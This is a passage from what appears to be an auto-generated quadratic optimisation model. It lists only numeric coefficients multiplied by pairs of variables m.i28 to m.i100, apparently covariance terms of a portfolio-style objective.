+ 0.01494338*m.i27*m.i97 + 0.01900252*m.i27*m.i98 + 0.01470772*m.i27*m.i99 + 0.01866828*m.i27*
m.i100 + 0.00362518*m.i28*m.i29 + 0.01640256*m.i28*m.i30 + 0.00349192*m.i28*m.i31 + 0.0129237*
m.i28*m.i32 + 0.00538584*m.i28*m.i33 + 0.00533474*m.i28*m.i34 + 0.00643216*m.i28*m.i35 +
0.01292206*m.i28*m.i36 + 0.00798078*m.i28*m.i37 + 0.0054977*m.i28*m.i38 + 0.00885966*m.i28*m.i39
+ 0.016828*m.i28*m.i40 + 0.01167374*m.i28*m.i41 + 0.00549216*m.i28*m.i42 + 0.00692364*m.i28*
m.i43 + 0.00370672*m.i28*m.i44 + 0.000284348*m.i28*m.i45 + 0.00277668*m.i28*m.i46 + 0.00936392*
m.i28*m.i47 + 0.00267238*m.i28*m.i48 + 0.00522892*m.i28*m.i49 + 0.00779258*m.i28*m.i50 +
0.0043462*m.i28*m.i51 + 0.00591302*m.i28*m.i52 + 0.00320368*m.i28*m.i53 + 0.00698682*m.i28*m.i54
+ 0.00560018*m.i28*m.i55 + 0.0075828*m.i28*m.i56 + 0.00361162*m.i28*m.i57 + 0.00229658*m.i28*
m.i58 + 0.00780328*m.i28*m.i59 + 0.0033416*m.i28*m.i60 + 0.01168298*m.i28*m.i61 + 0.0082366*m.i28
*m.i62 + 0.00465746*m.i28*m.i63 + 0.00328332*m.i28*m.i64 + 0.00685966*m.i28*m.i65 + 0.00386632*
m.i28*m.i66 + 0.0053142*m.i28*m.i67 + 0.00432904*m.i28*m.i68 + 0.00791276*m.i28*m.i69 + 0.0040137
*m.i28*m.i70 + 0.01081358*m.i28*m.i71 + 0.00841874*m.i28*m.i72 + 0.00534694*m.i28*m.i73 +
0.00677544*m.i28*m.i74 + 0.00391198*m.i28*m.i75 + 0.00308942*m.i28*m.i76 + 0.00250778*m.i28*m.i77
+ 0.00189916*m.i28*m.i78 + 0.00856184*m.i28*m.i79 + 0.00337182*m.i28*m.i80 + 0.00959416*m.i28*
m.i81 + 0.00329038*m.i28*m.i82 + 0.00388664*m.i28*m.i83 + 0.00685968*m.i28*m.i84 + 0.00406002*
m.i28*m.i85 + 0.00658126*m.i28*m.i86 + 0.00646838*m.i28*m.i87 + 0.0218548*m.i28*m.i88 +
0.00541992*m.i28*m.i89 + 0.00503116*m.i28*m.i90 + 0.00418236*m.i28*m.i91 + 0.0040874*m.i28*m.i92
+ 0.0022624*m.i28*m.i93 + 0.00392254*m.i28*m.i94 + 0.00482686*m.i28*m.i95 + 0.00726382*m.i28*
m.i96 + 0.00767472*m.i28*m.i97 + 0.01066418*m.i28*m.i98 + 0.00883358*m.i28*m.i99 + 0.0070211*
m.i28*m.i100 + 0.0147917*m.i29*m.i30 + 0.001068816*m.i29*m.i31 + 0.0105712*m.i29*m.i32 +
0.00407766*m.i29*m.i33 + 0.00300076*m.i29*m.i34 + 0.00524794*m.i29*m.i35 + 0.01016322*m.i29*m.i36
+ 0.00841674*m.i29*m.i37 + 0.00258632*m.i29*m.i38 + 0.00698836*m.i29*m.i39 + 0.01223674*m.i29*
m.i40 + 0.01128912*m.i29*m.i41 + 0.00481604*m.i29*m.i42 + 0.00316394*m.i29*m.i43 + 0.00690116*
m.i29*m.i44 + 0.00082418*m.i29*m.i45 + 0.00343988*m.i29*m.i46 + 0.00660586*m.i29*m.i47 +
0.00315994*m.i29*m.i48 + 0.004109*m.i29*m.i49 + 0.01072766*m.i29*m.i50 + 0.00295018*m.i29*m.i51
+ 0.00574084*m.i29*m.i52 + 0.00735384*m.i29*m.i53 + 0.00646518*m.i29*m.i54 + 0.00437712*m.i29*
m.i55 + 0.0050201*m.i29*m.i56 + 0.00428602*m.i29*m.i57 + 0.00339284*m.i29*m.i58 + 0.00395186*
m.i29*m.i59 + 0.00369852*m.i29*m.i60 + 0.01069104*m.i29*m.i61 + 0.00877524*m.i29*m.i62 +
0.00780122*m.i29*m.i63 + 0.00319846*m.i29*m.i64 + 0.00522668*m.i29*m.i65 + 0.00318906*m.i29*m.i66
+ 0.00765554*m.i29*m.i67 + 0.00353436*m.i29*m.i68 + 0.0090668*m.i29*m.i69 + 0.0062235*m.i29*
m.i70 + 0.00879038*m.i29*m.i71 + 0.00661754*m.i29*m.i72 + 0.00355728*m.i29*m.i73 + 0.0041974*
m.i29*m.i74 + 0.00530048*m.i29*m.i75 + 0.00543652*m.i29*m.i76 + 0.00436164*m.i29*m.i77 +
0.00450742*m.i29*m.i78 + 0.00725294*m.i29*m.i79 + 0.00491692*m.i29*m.i80 + 0.00689594*m.i29*m.i81
+ 0.00288614*m.i29*m.i82 + 0.005327*m.i29*m.i83 + 0.00356482*m.i29*m.i84 + 0.00320232*m.i29*
m.i85 + 0.00401206*m.i29*m.i86 + 0.00746968*m.i29*m.i87 + 0.01484586*m.i29*m.i88 + 0.00405332*
m.i29*m.i89 + 0.00646554*m.i29*m.i90 + 0.00398186*m.i29*m.i91 + 0.0045419*m.i29*m.i92 +
0.00249602*m.i29*m.i93 + 0.00344506*m.i29*m.i94 + 0.0046313*m.i29*m.i95 + 0.01012898*m.i29*m.i96
+ 0.00666118*m.i29*m.i97 + 0.00510452*m.i29*m.i98 + 0.00865974*m.i29*m.i99 + 0.00556162*m.i29*
m.i100 + 0.01432038*m.i30*m.i31 + 0.048762*m.i30*m.i32 + 0.03246*m.i30*m.i33 + 0.00510162*m.i30*
m.i34 + 0.00990812*m.i30*m.i35 + 0.0782504*m.i30*m.i36 + 0.0336068*m.i30*m.i37 + 0.00740496*m.i30
*m.i38 + 0.0520556*m.i30*m.i39 + 0.0689666*m.i30*m.i40 + 0.0338084*m.i30*m.i41 + 0.0303886*m.i30*
m.i42 + 0.01530392*m.i30*m.i43 + 0.0286584*m.i30*m.i44 + 0.001838718*m.i30*m.i45 + 0.01735792*
m.i30*m.i46 + 0.0257124*m.i30*m.i47 + 0.01952576*m.i30*m.i48 + 0.0285968*m.i30*m.i49 + 0.0597966*
m.i30*m.i50 + 0.0235442*m.i30*m.i51 + 0.0356002*m.i30*m.i52 + 0.056815*m.i30*m.i53 + 0.031993*
m.i30*m.i54 + 0.0256864*m.i30*m.i55 + 0.012682*m.i30*m.i56 + 0.01927838*m.i30*m.i57 + 0.0132181*
m.i30*m.i58 + 0.0308396*m.i30*m.i59 + 0.01646776*m.i30*m.i60 + 0.0691402*m.i30*m.i61 + 0.0539688*
m.i30*m.i62 + 0.0253122*m.i30*m.i63 + 0.0217306*m.i30*m.i64 + 0.0238236*m.i30*m.i65 + 0.01199066*
m.i30*m.i66 + 0.0301278*m.i30*m.i67 + 0.0209952*m.i30*m.i68 + 0.0484514*m.i30*m.i69 + 0.0226726*
m.i30*m.i70 + 0.02153*m.i30*m.i71 + 0.023498*m.i30*m.i72 + 0.0217474*m.i30*m.i73 + 0.0363548*
m.i30*m.i74 + 0.0290864*m.i30*m.i75 + 0.01738014*m.i30*m.i76 + 0.0248066*m.i30*m.i77 + 0.01560782
*m.i30*m.i78 + 0.0735134*m.i30*m.i79 + 0.0216582*m.i30*m.i80 + 0.030706*m.i30*m.i81 + 0.00888388*
m.i30*m.i82 + 0.00819988*m.i30*m.i83 + 0.02421*m.i30*m.i84 + 0.01903928*m.i30*m.i85 + 0.0384208*
m.i30*m.i86 + 0.0308632*m.i30*m.i87 + 0.112101*m.i30*m.i88 + 0.0313082*m.i30*m.i89 + 0.0480838*
m.i30*m.i90 + 0.0265036*m.i30*m.i91 + 0.0219052*m.i30*m.i92 + 0.01243318*m.i30*m.i93 + 0.00866336
*m.i30*m.i94 + 0.0318698*m.i30*m.i95 + 0.0809696*m.i30*m.i96 + 0.0362056*m.i30*m.i97 + 0.0307602*
m.i30*m.i98 + 0.0452826*m.i30*m.i99 + 0.0359652*m.i30*m.i100 + 0.01352968*m.i31*m.i32 +
0.01461656*m.i31*m.i33 + 0.00410226*m.i31*m.i34 + 0.00308616*m.i31*m.i35 + 0.0221942*m.i31*m.i36
+ 0.0095014*m.i31*m.i37 + 0.0001894118*m.i31*m.i38 + 0.01328104*m.i31*m.i39 + 0.0207254*m.i31*
m.i40 + 0.01363894*m.i31*m.i41 + 0.01129202*m.i31*m.i42 + 0.0108266*m.i31*m.i43 + 0.01097008*
m.i31*m.i44 + 0.00461712*m.i31*m.i45 + 0.00463752*m.i31*m.i46 + 0.00929264*m.i31*m.i47 +
0.00473752*m.i31*m.i48 + 0.0114599*m.i31*m.i49 + 0.0117742*m.i31*m.i50 + 0.0088573*m.i31*m.i51 +
0.0075837*m.i31*m.i52 + 0.00658756*m.i31*m.i53 + 0.0113218*m.i31*m.i54 + 0.00930362*m.i31*m.i55
+ 0.01063604*m.i31*m.i56 + 0.00432704*m.i31*m.i57 + 0.00804616*m.i31*m.i58 + 0.01180986*m.i31*
m.i59 + 0.0009047*m.i31*m.i60 + 0.01200762*m.i31*m.i61 + 0.00940268*m.i31*m.i62 + 0.01417994*
m.i31*m.i63 + 0.0076164*m.i31*m.i64 + 0.00575322*m.i31*m.i65 + 0.00834872*m.i31*m.i66 +
0.00454676*m.i31*m.i67 + 0.00544346*m.i31*m.i68 + 0.0132866*m.i31*m.i69 + 0.00553084*m.i31*m.i70
+ 0.01147094*m.i31*m.i71 + 0.00577578*m.i31*m.i72 + 0.00887008*m.i31*m.i73 + 0.01059428*m.i31*
m.i74 + 0.0040723*m.i31*m.i75 + 0.00207936*m.i31*m.i76 + 0.01175316*m.i31*m.i77 + 0.00278464*
m.i31*m.i78 + 0.00880162*m.i31*m.i79 + 0.0087823*m.i31*m.i80 + 0.00669872*m.i31*m.i81 +
0.001695732*m.i31*m.i82 + 0.01128974*m.i31*m.i83 + 0.0131319*m.i31*m.i84 + 0.00861518*m.i31*m.i85
+ 0.01080682*m.i31*m.i86 + 0.00523332*m.i31*m.i87 + 0.0207656*m.i31*m.i88 + 0.00591302*m.i31*
m.i89 + 0.00439716*m.i31*m.i90 + 0.0115743*m.i31*m.i91 + 0.00995262*m.i31*m.i92 + 0.000428388*
m.i31*m.i93 + 0.00464012*m.i31*m.i94 + 0.00813868*m.i31*m.i95 + 0.00570582*m.i31*m.i96 +
0.00954936*m.i31*m.i97 + 0.01038358*m.i31*m.i98 + 0.00920842*m.i31*m.i99 + 0.01146966*m.i31*
m.i100 + 0.0209668*m.i32*m.i33 + 0.0108011*m.i32*m.i34 + 0.01248282*m.i32*m.i35 + 0.0530038*m.i32
*m.i36 + 0.0301486*m.i32*m.i37 + 0.00760388*m.i32*m.i38 + 0.0317898*m.i32*m.i39 + 0.0642986*m.i32
*m.i40 + 0.0332684*m.i32*m.i41 + 0.0235182*m.i32*m.i42 + 0.0143552*m.i32*m.i43 + 0.0235288*m.i32*
m.i44 + 0.00682838*m.i32*m.i45 + 0.01137478*m.i32*m.i46 + 0.0318282*m.i32*m.i47 + 0.00984204*
m.i32*m.i48 + 0.0207836*m.i32*m.i49 + 0.0371082*m.i32*m.i50 + 0.01715818*m.i32*m.i51 + 0.0184894*
m.i32*m.i52 + 0.0241264*m.i32*m.i53 + 0.0254814*m.i32*m.i54 + 0.01913224*m.i32*m.i55 + 0.0212986*
m.i32*m.i56 + 0.01167336*m.i32*m.i57 + 0.01191892*m.i32*m.i58 + 0.0246844*m.i32*m.i59 +
0.00772776*m.i32*m.i60 + 0.0424102*m.i32*m.i61 + 0.0330624*m.i32*m.i62 + 0.0190237*m.i32*m.i63 +
0.01185726*m.i32*m.i64 + 0.01593976*m.i32*m.i65 + 0.00931156*m.i32*m.i66 + 0.01976096*m.i32*m.i67
+ 0.00940704*m.i32*m.i68 + 0.0353824*m.i32*m.i69 + 0.01637874*m.i32*m.i70 + 0.0234414*m.i32*
m.i71 + 0.01981882*m.i32*m.i72 + 0.01518934*m.i32*m.i73 + 0.0206944*m.i32*m.i74 + 0.01368518*
m.i32*m.i75 + 0.01085922*m.i32*m.i76 + 0.0142422*m.i32*m.i77 + 0.01225292*m.i32*m.i78 + 0.025216*
m.i32*m.i79 + 0.01581384*m.i32*m.i80 + 0.0226748*m.i32*m.i81 + 0.0078489*m.i32*m.i82 + 0.00488232
*m.i32*m.i83 + 0.01715432*m.i32*m.i84 + 0.01617784*m.i32*m.i85 + 0.0224728*m.i32*m.i86 +
0.0213528*m.i32*m.i87 + 0.0404024*m.i32*m.i88 + 0.00700416*m.i32*m.i89 + 0.0284686*m.i32*m.i90 +
0.01764584*m.i32*m.i91 + 0.01747106*m.i32*m.i92 + 0.00781272*m.i32*m.i93 + 0.01173676*m.i32*m.i94
+ 0.01901852*m.i32*m.i95 + 0.032411*m.i32*m.i96 + 0.0238232*m.i32*m.i97 + 0.021198*m.i32*m.i98
+ 0.0300116*m.i32*m.i99 + 0.0354006*m.i32*m.i100 + 0.0090127*m.i33*m.i34 + 0.00772724*m.i33*
m.i35 + 0.0313702*m.i33*m.i36 + 0.01413346*m.i33*m.i37 + 0.001835906*m.i33*m.i38 + 0.01789618*
m.i33*m.i39 + 0.0342932*m.i33*m.i40 + 0.0203234*m.i33*m.i41 + 0.01859662*m.i33*m.i42 + 0.00949822
*m.i33*m.i43 + 0.0173394*m.i33*m.i44 + 0.00462026*m.i33*m.i45 + 0.0076766*m.i33*m.i46 + 0.0195887
*m.i33*m.i47 + 0.00677792*m.i33*m.i48 + 0.01593666*m.i33*m.i49 + 0.0205366*m.i33*m.i50 +
0.01028686*m.i33*m.i51 + 0.01380638*m.i33*m.i52 + 0.0139701*m.i33*m.i53 + 0.016589*m.i33*m.i54 +
0.0139115*m.i33*m.i55 + 0.01339328*m.i33*m.i56 + 0.00706492*m.i33*m.i57 + 0.01010916*m.i33*m.i58
+ 0.0112109*m.i33*m.i59 + 0.0038394*m.i33*m.i60 + 0.0232104*m.i33*m.i61 + 0.01960694*m.i33*m.i62
+ 0.01805454*m.i33*m.i63 + 0.01327968*m.i33*m.i64 + 0.0135282*m.i33*m.i65 + 0.0101248*m.i33*
m.i66 + 0.00800254*m.i33*m.i67 + 0.0030849*m.i33*m.i68 + 0.0205056*m.i33*m.i69 + 0.00997944*m.i33
*m.i70 + 0.01867754*m.i33*m.i71 + 0.01023414*m.i33*m.i72 + 0.01414764*m.i33*m.i73 + 0.01623304*
m.i33*m.i74 + 0.00580254*m.i33*m.i75 + 0.00688906*m.i33*m.i76 + 0.01955742*m.i33*m.i77 +
0.0043617*m.i33*m.i78 + 0.0110714*m.i33*m.i79 + 0.00837212*m.i33*m.i80 + 0.0186224*m.i33*m.i81 +
0.0038599*m.i33*m.i82 + 0.01828456*m.i33*m.i83 + 0.01460176*m.i33*m.i84 + 0.00984126*m.i33*m.i85
+ 0.01375926*m.i33*m.i86 + 0.01081848*m.i33*m.i87 + 0.0294078*m.i33*m.i88 + 0.00904426*m.i33*
m.i89 + 0.01335384*m.i33*m.i90 + 0.00944562*m.i33*m.i91 + 0.01586856*m.i33*m.i92 + 0.00253356*
m.i33*m.i93 + 0.00579828*m.i33*m.i94 + 0.01264366*m.i33*m.i95 + 0.0212436*m.i33*m.i96 + 0.014968*
m.i33*m.i97 + 0.01459146*m.i33*m.i98 + 0.01990882*m.i33*m.i99 + 0.020898*m.i33*m.i100 + 0.0078456
*m.i34*m.i35 + 0.01102212*m.i34*m.i36 + 0.00676724*m.i34*m.i37 + 0.00365266*m.i34*m.i38 +
0.00595098*m.i34*m.i39 + 0.01153866*m.i34*m.i40 + 0.01058304*m.i34*m.i41 + 0.00838326*m.i34*m.i42
+ 0.00601354*m.i34*m.i43 + 0.00621002*m.i34*m.i44 + 0.00388646*m.i34*m.i45 + 0.00291464*m.i34*
m.i46 + 0.01279302*m.i34*m.i47 + 0.001590652*m.i34*m.i48 + 0.00546164*m.i34*m.i49 + 0.00756668*
m.i34*m.i50 + 0.00255946*m.i34*m.i51 + 0.00586752*m.i34*m.i52 - 0.0001086844*m.i34*m.i53 +
0.00756758*m.i34*m.i54 + 0.00472132*m.i34*m.i55 + 0.0090114*m.i34*m.i56 + 0.00404276*m.i34*m.i57
+ 0.00259172*m.i34*m.i58 + 0.0043188*m.i34*m.i59 + 0.00265148*m.i34*m.i60 + 0.00988174*m.i34*
m.i61 + 0.00773706*m.i34*m.i62 + 0.00871216*m.i34*m.i63 + 0.0051719*m.i34*m.i64 + 0.005674*m.i34*
m.i65 + 0.0042472*m.i34*m.i66 + 0.0029352*m.i34*m.i67 + 0.00380488*m.i34*m.i68 + 0.00782908*m.i34
*m.i69 + 0.00528678*m.i34*m.i70 + 0.01141144*m.i34*m.i71 + 0.00731358*m.i34*m.i72 + 0.00557996*
m.i34*m.i73 + 0.00428558*m.i34*m.i74 + 0.00214164*m.i34*m.i75 + 0.001888024*m.i34*m.i76 +
0.00450712*m.i34*m.i77 + 0.001974898*m.i34*m.i78 + 0.000555542*m.i34*m.i79 + 0.004826*m.i34*m.i80
+ 0.01009798*m.i34*m.i81 + 0.00342408*m.i34*m.i82 + 0.0066259*m.i34*m.i83 + 0.00557372*m.i34*
m.i84 + 0.00493326*m.i34*m.i85 + 0.0033431*m.i34*m.i86 + 0.00355798*m.i34*m.i87 + 0.0070914*m.i34
*m.i88 + 0.00319452*m.i34*m.i89 + 0.001165088*m.i34*m.i90 + 0.00330168*m.i34*m.i91 + 0.00487072*
m.i34*m.i92 + 0.001039364*m.i34*m.i93 + 0.00462638*m.i34*m.i94 + 0.00474964*m.i34*m.i95 +
0.00307738*m.i34*m.i96 + 0.00634158*m.i34*m.i97 + 0.0093911*m.i34*m.i98 + 0.00479968*m.i34*m.i99
+ 0.00945466*m.i34*m.i100 + 0.00886108*m.i35*m.i36 + 0.008324*m.i35*m.i37 + 0.0042517*m.i35*
m.i38 + 0.0063195*m.i35*m.i39 + 0.00897334*m.i35*m.i40 + 0.01438534*m.i35*m.i41 + 0.00707384*
m.i35*m.i42 + 0.00524994*m.i35*m.i43 + 0.00729354*m.i35*m.i44 + 0.00231104*m.i35*m.i45 +
0.00317018*m.i35*m.i46 + 0.01095322*m.i35*m.i47 + 0.00256082*m.i35*m.i48 + 0.0066693*m.i35*m.i49
+ 0.00896786*m.i35*m.i50 + 0.00243944*m.i35*m.i51 + 0.00542922*m.i35*m.i52 + 0.001853016*m.i35*
m.i53 + 0.0080304*m.i35*m.i54 + 0.004194*m.i35*m.i55 + 0.00944224*m.i35*m.i56 + 0.0044097*m.i35*
m.i57 + 0.00234874*m.i35*m.i58 + 0.0045055*m.i35*m.i59 + 0.00387194*m.i35*m.i60 + 0.01070194*
m.i35*m.i61 + 0.01020854*m.i35*m.i62 + 0.00869604*m.i35*m.i63 + 0.0038381*m.i35*m.i64 +
0.00566828*m.i35*m.i65 + 0.00392276*m.i35*m.i66 + 0.00493806*m.i35*m.i67 + 0.00543634*m.i35*m.i68
+ 0.01090284*m.i35*m.i69 + 0.00744802*m.i35*m.i70 + 0.01323476*m.i35*m.i71 + 0.00994186*m.i35*
m.i72 + 0.00554564*m.i35*m.i73 + 0.00631474*m.i35*m.i74 + 0.00456554*m.i35*m.i75 + 0.00357674*
m.i35*m.i76 + 0.00520436*m.i35*m.i77 + 0.0030095*m.i35*m.i78 + 0.0057729*m.i35*m.i79 + 0.00411204
*m.i35*m.i80 + 0.00953392*m.i35*m.i81 + 0.00378046*m.i35*m.i82 + 0.00572152*m.i35*m.i83 +
0.00613732*m.i35*m.i84 + 0.00382166*m.i35*m.i85 + 0.00356476*m.i35*m.i86 + 0.00634394*m.i35*m.i87
+ 0.0111758*m.i35*m.i88 + 0.00567884*m.i35*m.i89 + 0.00368822*m.i35*m.i90 + 0.00382434*m.i35*
m.i91 + 0.00295216*m.i35*m.i92 + 0.00261056*m.i35*m.i93 + 0.00538486*m.i35*m.i94 + 0.00508518*
m.i35*m.i95 + 0.00571674*m.i35*m.i96 + 0.00749186*m.i35*m.i97 + 0.00986618*m.i35*m.i98 +
0.00565378*m.i35*m.i99 + 0.0094721*m.i35*m.i100 + 0.0440606*m.i36*m.i37 + 0.0069763*m.i36*m.i38
+ 0.0493166*m.i36*m.i39 + 0.121634*m.i36*m.i40 + 0.0358136*m.i36*m.i41 + 0.0380066*m.i36*m.i42
+ 0.0240066*m.i36*m.i43 + 0.0315302*m.i36*m.i44 + 0.00778714*m.i36*m.i45 + 0.01711478*m.i36*
m.i46 + 0.0433014*m.i36*m.i47 + 0.01592312*m.i36*m.i48 + 0.0219624*m.i36*m.i49 + 0.0584382*m.i36*
m.i50 + 0.0237454*m.i36*m.i51 + 0.030079*m.i36*m.i52 + 0.0450814*m.i36*m.i53 + 0.0285826*m.i36*
m.i54 + 0.0266392*m.i36*m.i55 + 0.01830758*m.i36*m.i56 + 0.01364522*m.i36*m.i57 + 0.01568*m.i36*
m.i58 + 0.0359108*m.i36*m.i59 + 0.00643528*m.i36*m.i60 + 0.056249*m.i36*m.i61 + 0.0503568*m.i36*
m.i62 + 0.0221574*m.i36*m.i63 + 0.023432*m.i36*m.i64 + 0.0219264*m.i36*m.i65 + 0.01946022*m.i36*
m.i66 + 0.0301552*m.i36*m.i67 + 0.00986666*m.i36*m.i68 + 0.0496472*m.i36*m.i69 + 0.0177644*m.i36*
m.i70 + 0.0308856*m.i36*m.i71 + 0.01899074*m.i36*m.i72 + 0.01805938*m.i36*m.i73 + 0.0273694*m.i36
*m.i74 + 0.01662774*m.i36*m.i75 + 0.00832596*m.i36*m.i76 + 0.0203852*m.i36*m.i77 + 0.0174271*
m.i36*m.i78 + 0.039217*m.i36*m.i79 + 0.0232082*m.i36*m.i80 + 0.0357644*m.i36*m.i81 + 0.00331724*
m.i36*m.i82 + 0.0276304*m.i36*m.i83 + 0.0267904*m.i36*m.i84 + 0.02756*m.i36*m.i85 + 0.0320374*
m.i36*m.i86 + 0.0222598*m.i36*m.i87 + 0.0496644*m.i36*m.i88 + 0.01118028*m.i36*m.i89 + 0.0432572*
m.i36*m.i90 + 0.027434*m.i36*m.i91 + 0.0293774*m.i36*m.i92 + 0.0055352*m.i36*m.i93 + 0.00852418*
m.i36*m.i94 + 0.028037*m.i36*m.i95 + 0.0642512*m.i36*m.i96 + 0.0386458*m.i36*m.i97 + 0.040981*
m.i36*m.i98 + 0.04604*m.i36*m.i99 + 0.0478424*m.i36*m.i100 + 0.00525362*m.i37*m.i38 + 0.0212576*
m.i37*m.i39 + 0.0543916*m.i37*m.i40 + 0.018282*m.i37*m.i41 + 0.01700698*m.i37*m.i42 + 0.00953368*
m.i37*m.i43 + 0.0147155*m.i37*m.i44 + 0.00425042*m.i37*m.i45 + 0.00777022*m.i37*m.i46 +
0.01646346*m.i37*m.i47 + 0.00740598*m.i37*m.i48 + 0.01274586*m.i37*m.i49 + 0.0282742*m.i37*m.i50
+ 0.01506898*m.i37*m.i51 + 0.01409464*m.i37*m.i52 + 0.01916222*m.i37*m.i53 + 0.01572296*m.i37*
m.i54 + 0.01361714*m.i37*m.i55 + 0.01302042*m.i37*m.i56 + 0.00807862*m.i37*m.i57 + 0.00701644*
m.i37*m.i58 + 0.0201438*m.i37*m.i59 + 0.00497496*m.i37*m.i60 + 0.0259544*m.i37*m.i61 + 0.01982096
*m.i37*m.i62 + 0.01082904*m.i37*m.i63 + 0.00909066*m.i37*m.i64 + 0.0112364*m.i37*m.i65 +
0.0089483*m.i37*m.i66 + 0.01522148*m.i37*m.i67 + 0.00459152*m.i37*m.i68 + 0.0214858*m.i37*m.i69
+ 0.01075074*m.i37*m.i70 + 0.0132224*m.i37*m.i71 + 0.00980738*m.i37*m.i72 + 0.00885252*m.i37*
m.i73 + 0.01427422*m.i37*m.i74 + 0.00903996*m.i37*m.i75 + 0.00768272*m.i37*m.i76 + 0.0103221*
m.i37*m.i77 + 0.01082002*m.i37*m.i78 + 0.0248284*m.i37*m.i79 + 0.01098172*m.i37*m.i80 +
0.01335848*m.i37*m.i81 + 0.00545734*m.i37*m.i82 + 0.00921544*m.i37*m.i83 + 0.0110069*m.i37*m.i84
+ 0.01385998*m.i37*m.i85 + 0.01437348*m.i37*m.i86 + 0.01621552*m.i37*m.i87 + 0.01981332*m.i37*
m.i88 + 0.00549314*m.i37*m.i89 + 0.0210958*m.i37*m.i90 + 0.0116061*m.i37*m.i91 + 0.01444326*m.i37
*m.i92 + 0.00631646*m.i37*m.i93 + 0.00847398*m.i37*m.i94 + 0.0132838*m.i37*m.i95 + 0.0257442*
m.i37*m.i96 + 0.01746728*m.i37*m.i97 + 0.01331586*m.i37*m.i98 + 0.0246618*m.i37*m.i99 + 0.0231186
*m.i37*m.i100 + 0.00427726*m.i38*m.i39 + 0.00960742*m.i38*m.i40 + 0.00588794*m.i38*m.i41 +
0.0040899*m.i38*m.i42 + 0.00370486*m.i38*m.i43 + 0.001581616*m.i38*m.i44 + 0.00157779*m.i38*m.i45
+ 0.001517842*m.i38*m.i46 + 0.00577098*m.i38*m.i47 + 0.00184948*m.i38*m.i48 + 0.001412132*m.i38*
m.i49 + 0.00473326*m.i38*m.i50 + 0.001265572*m.i38*m.i51 + 0.00389392*m.i38*m.i52 + 0.00195541*
m.i38*m.i53 + 0.0045747*m.i38*m.i54 + 0.003024*m.i38*m.i55 + 0.00322834*m.i38*m.i56 + 0.00240162*
m.i38*m.i57 + 0.000494648*m.i38*m.i58 + 0.0035117*m.i38*m.i59 + 0.00302272*m.i38*m.i60 +
0.0067192*m.i38*m.i61 + 0.00576934*m.i38*m.i62 + 0.00236514*m.i38*m.i63 + 0.00208302*m.i38*m.i64
+ 0.00359594*m.i38*m.i65 + 0.001590092*m.i38*m.i66 + 0.00239398*m.i38*m.i67 + 0.00302224*m.i38*
m.i68 + 0.00326928*m.i38*m.i69 + 0.00302294*m.i38*m.i70 + 0.0049377*m.i38*m.i71 + 0.00553496*
m.i38*m.i72 + 0.00229972*m.i38*m.i73 + 0.00318332*m.i38*m.i74 + 0.00325074*m.i38*m.i75 +
0.001803886*m.i38*m.i76 + 0.000902562*m.i38*m.i77 + 0.001651326*m.i38*m.i78 + 0.0039935*m.i38*
m.i79 + 0.00233242*m.i38*m.i80 + 0.00546644*m.i38*m.i81 + 0.00223454*m.i38*m.i82 - 0.001681894*
m.i38*m.i83 + 0.0025273*m.i38*m.i84 + 0.0032781*m.i38*m.i85 + 0.001557044*m.i38*m.i86 +
0.00327138*m.i38*m.i87 + 0.00674346*m.i38*m.i88 + 0.0020784*m.i38*m.i89 + 0.00343958*m.i38*m.i90
+ 0.00324954*m.i38*m.i91 + 0.00206404*m.i38*m.i92 + 0.00161462*m.i38*m.i93 + 0.00247166*m.i38*
m.i94 + 0.00341238*m.i38*m.i95 + 0.00585902*m.i38*m.i96 + 0.00423638*m.i38*m.i97 + 0.00566634*
m.i38*m.i98 + 0.00315378*m.i38*m.i99 + 0.00449598*m.i38*m.i100 + 0.0491892*m.i39*m.i40 +
0.0262408*m.i39*m.i41 + 0.0205234*m.i39*m.i42 + 0.01409356*m.i39*m.i43 + 0.0195666*m.i39*m.i44 +
0.00525174*m.i39*m.i45 + 0.01076856*m.i39*m.i46 + 0.0216478*m.i39*m.i47 + 0.01097136*m.i39*m.i48
+ 0.0178672*m.i39*m.i49 + 0.0324104*m.i39*m.i50 + 0.0147971*m.i39*m.i51 + 0.01855664*m.i39*m.i52
+ 0.0250992*m.i39*m.i53 + 0.0213078*m.i39*m.i54 + 0.01575182*m.i39*m.i55 + 0.01438592*m.i39*
m.i56 + 0.0105253*m.i39*m.i57 + 0.01177712*m.i39*m.i58 + 0.0207946*m.i39*m.i59 + 0.00650454*m.i39
*m.i60 + 0.036126*m.i39*m.i61 + 0.0278076*m.i39*m.i62 + 0.0206546*m.i39*m.i63 + 0.01499036*m.i39*
m.i64 + 0.01276412*m.i39*m.i65 + 0.0125414*m.i39*m.i66 + 0.01617824*m.i39*m.i67 + 0.010394*m.i39*
m.i68 + 0.0290228*m.i39*m.i69 + 0.01190924*m.i39*m.i70 + 0.01824964*m.i39*m.i71 + 0.014012*m.i39*
m.i72 + 0.01408568*m.i39*m.i73 + 0.0192582*m.i39*m.i74 + 0.01283914*m.i39*m.i75 + 0.00757714*
m.i39*m.i76 + 0.0157748*m.i39*m.i77 + 0.00886562*m.i39*m.i78 + 0.0226622*m.i39*m.i79 + 0.01506442
*m.i39*m.i80 + 0.01868878*m.i39*m.i81 + 0.00371016*m.i39*m.i82 + 0.01245306*m.i39*m.i83 +
0.01693888*m.i39*m.i84 + 0.0145704*m.i39*m.i85 + 0.0207926*m.i39*m.i86 + 0.01487822*m.i39*m.i87
+ 0.0465058*m.i39*m.i88 + 0.01052428*m.i39*m.i89 + 0.0220072*m.i39*m.i90 + 0.01887928*m.i39*
m.i91 + 0.01597714*m.i39*m.i92 + 0.00531126*m.i39*m.i93 + 0.00658506*m.i39*m.i94 + 0.01713092*
m.i39*m.i95 + 0.0328166*m.i39*m.i96 + 0.0213542*m.i39*m.i97 + 0.0210286*m.i39*m.i98 + 0.0255336*
m.i39*m.i99 + 0.0274274*m.i39*m.i100 + 0.0504412*m.i40*m.i41 + 0.0336102*m.i40*m.i42 + 0.0294804*
m.i40*m.i43 + 0.0424704*m.i40*m.i44 + 0.0030095*m.i40*m.i45 + 0.01146224*m.i40*m.i46 + 0.0507426*
m.i40*m.i47 + 0.01585054*m.i40*m.i48 + 0.0217164*m.i40*m.i49 + 0.0491478*m.i40*m.i50 + 0.0317926*
m.i40*m.i51 + 0.0284682*m.i40*m.i52 + 0.0468934*m.i40*m.i53 + 0.0309254*m.i40*m.i54 + 0.028626*
m.i40*m.i55 + 0.0309698*m.i40*m.i56 + 0.01062184*m.i40*m.i57 + 0.01987174*m.i40*m.i58 + 0.0429952
*m.i40*m.i59 + 0.00300922*m.i40*m.i60 + 0.0574936*m.i40*m.i61 + 0.0496304*m.i40*m.i62 +
